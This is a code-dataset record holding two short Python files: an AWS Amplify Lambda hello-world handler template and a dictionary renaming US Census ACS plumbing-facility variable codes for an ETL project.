| 2021-09-15T03:01:46
| 2021-09-15T03:01:46
| 406,576,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 380
|
py
|
import json
def handler(event, context):
print('received event:')
print(event)
return {
'statusCode': 200,
'headers': {
'Access-Control-Allow-Headers': '*',
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'OPTIONS,POST,GET'
},
'body': json.dumps('Hello from your new Amplify Python lambda!')
}
|
[
"cameron.hebert@opsguru.io"
] |
cameron.hebert@opsguru.io
|
8dcb937ae42edefdcbf4daffa1f87a7d8005a663
|
66137e154dbe9b9f1d4056dd2cc06daedf2d27fe
|
/acs/acs_ygh_occupied_households_lacking_plumbing/static.py
|
e3c6298668e3537d2584f0f9d02f836b1eb831dd
|
[] |
no_license
|
domsmo/datausa-acs-bamboo-etl
|
edb90504b2418e3ef2c1574cd270a5b54122a1d7
|
07cca23a9003719b1d8bc07c3c417253d68c9ba6
|
refs/heads/main
| 2023-08-31T23:20:56.598074
| 2021-10-23T07:40:14
| 2021-10-23T07:40:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
DICT_RENAME = {
'B25048_002E': 'mea-0',
'B25048_003E': 'mea-1',
'B25048_002M': 'moe-0',
'B25048_003M': 'moe-1',
}
|
[
"jelmyhermosilla@MacBook-Pro-de-jelmy.local"
] |
jelmyhermosilla@MacBook-Pro-de-jelmy.local
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.